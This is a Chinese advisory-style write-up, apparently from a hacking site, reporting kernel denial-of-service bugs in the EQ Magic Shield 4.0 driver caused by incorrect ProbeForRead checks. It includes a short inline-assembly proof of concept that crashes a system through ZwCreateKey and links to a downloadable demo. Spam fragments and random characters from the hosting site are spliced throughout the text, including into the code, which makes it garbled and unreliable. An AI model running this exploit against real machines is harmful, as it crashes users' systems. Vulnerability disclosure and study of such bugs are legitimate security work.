EQ魔法盾 4.0增强版(version:20080902及以下)多处内核拒绝服务漏洞

炼域人生

EQ魔法盾的驱动程序员对用户态参数检查有一定概念，可惜没有正确理解ProbeForRead的用法，导致几乎所有的SSDT HOOK函数都存在用户态检查不正确的问题,漏洞多达数十处。
( A% F; K& x% @  g黑客技术,QQ黑客,网页木马,远程控制,工具下载,黑客揭秘,动画教程黑客技术,QQ黑客,网页木马,远程控制,工具下载,黑客揭秘,动画教程6 @4 b) V  w5 h& |+ s+ F" h& ~
此漏洞可导致任意用户权限的程序可以在安装了EQ魔法盾的系统上引发蓝屏 www.hack79.com/ A: t  e0 a/ H( l' L  m6 K7 p

# q% @! z5 }2 T( e5 p' O2 u出问题的组件：EQSysSecure.sys ,版本:2008.9.1.26 CheckSum = 0x0001EFD3 TimeStamp = 0x48BAC155 IT加油站全心全意的为你服务，你满意是我们最好的答案8 q0 N4 w; S8 e

% j2 u; v* X, V9 o0 gIT加油站全心全意的为你服务，你满意是我们最好的答案EQ魔法盾的驱动中有这样一个函数 :偏移608d处 sub_16c8d 黑客技术,QQ黑客,网页木马,远程控制,工具下载,黑客揭秘,动画教程; {$ ], P- I: s- Z2 w/ ]- n- X3 x' I
0 R/ r: f& r7 u1 N: x2 g9 ?4 G
该函数处于一个带Try..Except的结构中，使用ProbeForRead来检查参数 IT加油站) O0 c( s5 z+ j

; w0 S; K2 q, S  d1 j3 IIT加油站全心全意的为你服务，你满意是我们最好的答案检查完毕后即直接用户态参数，而实际上，如果传入用户态无效地址，ProbeForRead是不会产生任何反应的，因此读写用户态缓存的代码也必须置于结构化异常处理之中。 IT加油站; Q+ Q5 s6 _: V/ e$ H' I0 E" w) o
黑客技术,QQ黑客,网页木马,远程控制,工具下载,黑客揭秘,动画教程( L' J; b; _; G% E. S
这个问题存在于EQ的大部分HOOK函数中，有几十处之多，这里只举出一个例子:
  O8 S; D$ v3 I+ \, ]- q; Hwww.hack79.com
0 a8 D5 D2 _& a' q, C/ |IT加油站全心全意的为你服务，你满意是我们最好的答案ZwCreateKey,下面是测试代码，运行此代码后安装了EQ魔法盾的系统上即会引发蓝屏重启：
- ?: [6 J, q% T$ G8 g5 s黑客技术,QQ黑客,网页木马,远程控制,工具下载,黑客揭秘,动画教程
) C% S9 e1 n$ q  Z- gIT加油站HMODULE hlib = LoadLibrary("ntdll.dll");
: L  k" Z  r( a! K: rIT加油站PVOID p = GetProcAddress(hlib , "ZwCreateKey"); IT加油站3 W) N/ C( f* c: Q* L/ Y( A& }

/ t" Z3 f) Z0 N# d# U7 y__asm{
2 Z# E1 D- Q) x, V7 oIT加油站全心全意的为你服务，你满意是我们最好的答案push 0
3 s) ^$ T# K* y( ?! @: h黑客技术|工具下载|动画教程|免杀交流|菜鸟入门|免费信息|注册码大全|远程控制|网页挂马|装机必备|push 0 / f% a5 i( X( O* d0 {
push 0 8 L% }3 d- [: u! ^$ i  a9 }
push 0
9 o( g5 n; R- E: o( [IT加油站push 1
' f! p2 f* [# K; ?0 ]* w; F4 T8 r6 vwww.hack79.compush 0
( u0 O* o' Z. x/ {7 K) T% b黑客技术|工具下载|动画教程|免杀交流|菜鸟入门|免费信息|注册码大全|远程控制|网页挂马|装机必备|push 0
4 ]! J/ N( E6 @. A黑客技术|工具下载|动画教程|免杀交流|菜鸟入门|免费信息|注册码大全|远程控制|网页挂马|装机必备|call p
3 g. ?( Q; |8 o' b0 ]IT加油站}
  _& g6 h4 f" N$ K% R黑客技术,QQ黑客,网页木马,远程控制,工具下载,黑客揭秘,动画教程IT加油站2 X4 y# H- L, v# Z* B) m
测试程序下载:http://mj0011.ys168.com ,漏洞演示下BSOD_EQ.rar